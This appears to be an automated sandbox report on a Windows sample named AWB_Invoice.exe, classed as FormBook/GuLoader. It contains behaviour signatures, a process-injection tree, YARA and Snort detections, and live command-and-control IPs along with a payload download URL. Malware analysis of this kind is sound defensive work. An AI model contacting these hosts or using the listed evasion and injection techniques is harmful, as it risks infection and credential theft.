Windows Analysis Report
AWB_Invoice.exe

Overview

General Information

Sample Name:AWB_Invoice.exe
Analysis ID:843118
MD5:7af40e9fbf9f324ea0a2db18268e592c
SHA1:49fa548e22d4206e7e6faeac24a78bd1a1e257f4
SHA256:caf7ce820152ced9c7e32dcb331899c2dd5ab092c7207f5994a4ef866d247197

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to detect Any.run
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Found potential ransomware demand text
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • AWB_Invoice.exe (PID: 6108 cmdline: C:\Users\user\Desktop\AWB_Invoice.exe MD5: 7AF40E9FBF9F324EA0A2DB18268E592C)
    • AWB_Invoice.exe (PID: 4984 cmdline: C:\Users\user\Desktop\AWB_Invoice.exe MD5: 7AF40E9FBF9F324EA0A2DB18268E592C)
      • RAVCpl64.exe (PID: 7740 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • control.exe (PID: 8968 cmdline: C:\Windows\SysWOW64\control.exe MD5: 4DBD69D4C9DA5AAAC731F518EF8EBEA0)
          • explorer.exe (PID: 4844 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
          • firefox.exe (PID: 4436 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x1f0b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x182e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.62278722180.0000000000060000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.62278722180.0000000000060000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      No Sigma rule has matched
      Timestamp:04/07/23-15:05:57.890423
      Source IP:192.168.11.20
      Destination IP:54.159.4.226
      SID:2031449
      Source Port:49877
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:04/07/23-15:03:54.747862
      Source IP:192.168.11.20
      Destination IP:122.201.127.1
      SID:2031453
      Source Port:49864
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:04/07/23-15:02:49.669494
      Source IP:192.168.11.20
      Destination IP:124.71.228.145
      SID:2018752
      Source Port:49852
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:04/07/23-15:03:54.747862
      Source IP:192.168.11.20
      Destination IP:122.201.127.1
      SID:2031412
      Source Port:49864
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:04/07/23-15:03:29.412332
      Source IP:192.168.11.20
      Destination IP:9.9.9.9
      SID:2023883
      Source Port:55379
      Destination Port:53
      Protocol:UDP
      Classtype:Potentially Bad Traffic
      Timestamp:04/07/23-15:09:14.069002
      Source IP:192.168.11.20
      Destination IP:122.201.127.1
      SID:2031412
      Source Port:49920
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:04/07/23-15:03:54.747862
      Source IP:192.168.11.20
      Destination IP:122.201.127.1
      SID:2031449
      Source Port:49864
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:04/07/23-15:09:14.069002
      Source IP:192.168.11.20
      Destination IP:122.201.127.1
      SID:2031453
      Source Port:49920
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:04/07/23-15:05:57.890423
      Source IP:192.168.11.20
      Destination IP:54.159.4.226
      SID:2031412
      Source Port:49877
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:04/07/23-15:09:14.069002
      Source IP:192.168.11.20
      Destination IP:122.201.127.1
      SID:2031449
      Source Port:49920
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:04/07/23-15:05:57.890423
      Source IP:192.168.11.20
      Destination IP:54.159.4.226
      SID:2031453
      Source Port:49877
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      AV Detection

      Source: AWB_Invoice.exe, ReversingLabs: Detection: 35%
      Source: AWB_Invoice.exe, Virustotal: Detection: 54%
      Source: Yara match, File source: 00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000004.00000002.62278722180.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000006.00000002.66851913423.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000004.00000002.62378186265.0000000035480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000006.00000002.66851591870.0000000003060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: http://124.71.228.145/sCgFrPXHcEhHCJiO9.bin, Avira URL Cloud: Label: malware
      Source: 7.2.explorer.exe.13513814.0.unpack, Avira: Label: TR/Patched.Ren.Gen
      Source: 6.2.control.exe.4f33814.3.unpack, Avira: Label: TR/Patched.Ren.Gen
      Source: 7.0.explorer.exe.13513814.0.unpack, Avira: Label: TR/Patched.Ren.Gen
      Source: 8.2.firefox.exe.31753814.0.unpack, Avira: Label: TR/Patched.Ren.Gen
      Source: AWB_Invoice.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: AWB_Invoice.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: AWB_Invoice.exe, 00000004.00000001.62106830623.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: control.pdb source: AWB_Invoice.exe, 00000004.00000002.62279050012.0000000000090000.00000040.10000000.00040000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62364598313.00000000052F7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: AWB_Invoice.exe, 00000004.00000003.62234452698.000000003563F000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000003.62227876661.0000000035485000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62379354895.00000000357F0000.00000040.00001000.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62379354895.000000003591D000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000002.66854668230.0000000004CFD000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000003.62283963539.0000000004A27000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.66854668230.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000003.62278595499.000000000487A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: AWB_Invoice.exe, AWB_Invoice.exe, 00000004.00000003.62234452698.000000003563F000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000003.62227876661.0000000035485000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62379354895.00000000357F0000.00000040.00001000.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62379354895.000000003591D000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000002.66854668230.0000000004CFD000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000003.62283963539.0000000004A27000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.66854668230.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000003.62278595499.000000000487A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: control.pdbUGP source: AWB_Invoice.exe, 00000004.00000002.62279050012.0000000000090000.00000040.10000000.00040000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62364598313.00000000052F7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: AWB_Invoice.exe, 00000004.00000001.62106830623.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: firefox.pdb source: control.exe, 00000006.00000003.62576801263.0000000007FD2000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\AWB_Invoice.exe, Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C49
      Source: C:\Users\user\Desktop\AWB_Invoice.exe, Code function: 1_2_00406873 FindFirstFileW,FindClose,1_2_00406873
      Source: C:\Users\user\Desktop\AWB_Invoice.exe, Code function: 1_2_0040290B FindFirstFileW,1_2_0040290B

      Networking

      Source: Traffic, Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49852 -> 124.71.228.145:80
      Source: Traffic, Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.11.20:55379 -> 9.9.9.9:53
      Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49864 -> 122.201.127.1:80
      Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49864 -> 122.201.127.1:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49864 -> 122.201.127.1:80
      Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49877 -> 54.159.4.226:80
      Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49877 -> 54.159.4.226:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49877 -> 54.159.4.226:80
      Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49920 -> 122.201.127.1:80
      Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49920 -> 122.201.127.1:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49920 -> 122.201.127.1:80
      Source: Joe Sandbox View, ASN Name: HWCSNETHuaweiCloudServicedatacenterCN HWCSNETHuaweiCloudServicedatacenterCN
      Source: unknown, Network traffic detected: HTTP traffic on port 49838 -> 443
      Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49838
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 07 Apr 2023 13:03:46 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 f4 f3 f7 ec 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 94 82 1d 7b 92 cb c5 12 b6 91 61 1d 87 60 04 5e c4 46 e0 04 89 b7 68 c6 ea bb 95 7f 98 52 35 e2 24 95 25 48 f4 39 50 66 32 b0 7f e9 e1 ac 33 84 c2 bd 57 0e 62 00 b6 2e 43 a6 f4 45 69 2e f0 34 d9 ee 8d 71 ec 62 d0 de 8f d7 a0 e1 5f 80 86 52 8a 69 1a 44 e1 50 14 a6 54 86 9f ad f3 04 9c 46 17 3e 80 23 0c 99 40 07 e8 2a dc c6 c3 70 a4 c0 55 b7 3a 98 0a fe 26 fb 59 8b d3 21 25 7a 7d 40 f3 0d 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eeUAO0fg1k'&11,DL$pgy^w<v~SkV|mg^K{a`^FhR5$%H9Pf23Wb.CEi.4qb_RiDPTF>#@*pU:&Y!%z}@Y<;0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 07 Apr 2023 13:03:49 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 f4 f3 f7 ec 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 94 82 1d 7b 92 cb c5 12 b6 91 61 1d 87 60 04 5e c4 46 e0 04 89 b7 68 c6 ea bb 95 7f 98 52 35 e2 24 95 25 48 f4 39 50 66 32 b0 7f e9 e1 ac 33 84 c2 bd 57 0e 62 00 b6 2e 43 a6 f4 45 69 2e f0 34 d9 ee 8d 71 ec 62 d0 de 8f d7 a0 e1 5f 80 86 52 8a 69 1a 44 e1 50 14 a6 54 86 9f ad f3 04 9c 46 17 3e 80 23 0c 99 40 07 e8 2a dc c6 c3 70 a4 c0 55 b7 3a 98 0a fe 26 fb 59 8b d3 21 25 7a 7d 40 f3 0d 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eeUAO0fg1k'&11,DL$pgy^w<v~SkV|mg^K{a`^FhR5$%H9Pf23Wb.CEi.4qb_RiDPTF>#@*pU:&Y!%z}@Y<;0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 07 Apr 2023 13:03:52 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 f4 f3 f7 ec 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 94 82 1d 7b 92 cb c5 12 b6 91 61 1d 87 60 04 5e c4 46 e0 04 89 b7 68 c6 ea bb 95 7f 98 52 35 e2 24 95 25 48 f4 39 50 66 32 b0 7f e9 e1 ac 33 84 c2 bd 57 0e 62 00 b6 2e 43 a6 f4 45 69 2e f0 34 d9 ee 8d 71 ec 62 d0 de 8f d7 a0 e1 5f 80 86 52 8a 69 1a 44 e1 50 14 a6 54 86 9f ad f3 04 9c 46 17 3e 80 23 0c 99 40 07 e8 2a dc c6 c3 70 a4 c0 55 b7 3a 98 0a fe 26 fb 59 8b d3 21 25 7a 7d 40 f3 0d 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eeUAO0fg1k'&11,DL$pgy^w<v~SkV|mg^K{a`^FhR5$%H9Pf23Wb.CEi.4qb_RiDPTF>#@*pU:&Y!%z}@Y<;0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 07 Apr 2023 13:03:54 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Apr 2023 13:04:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Apr 2023 13:04:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Apr 2023 13:04:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Apr 2023 13:04:08 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global traffic
      HTTP traffic detected: HTTP/1.1 404 Not Found
      Server: nginx
      Date: Fri, 07 Apr 2023 13:05:50 GMT
      Content-Type: text/html; charset=UTF-8
      X-Drupal-Cache: MISS
      Expires: Sun, 19 Nov 1978 05:00:00 GMT
      X-Content-Type-Options: nosniff
      X-Request-ID: v-eb409396-d544-11ed-a2c8-9b1543701bb2
      X-AH-Environment: prod
      Cache-Control: max-age=900, public
      Age: 0
      Via: varnish
      X-Cache: MISS
      Transfer-Encoding: chunked
      Connection: close
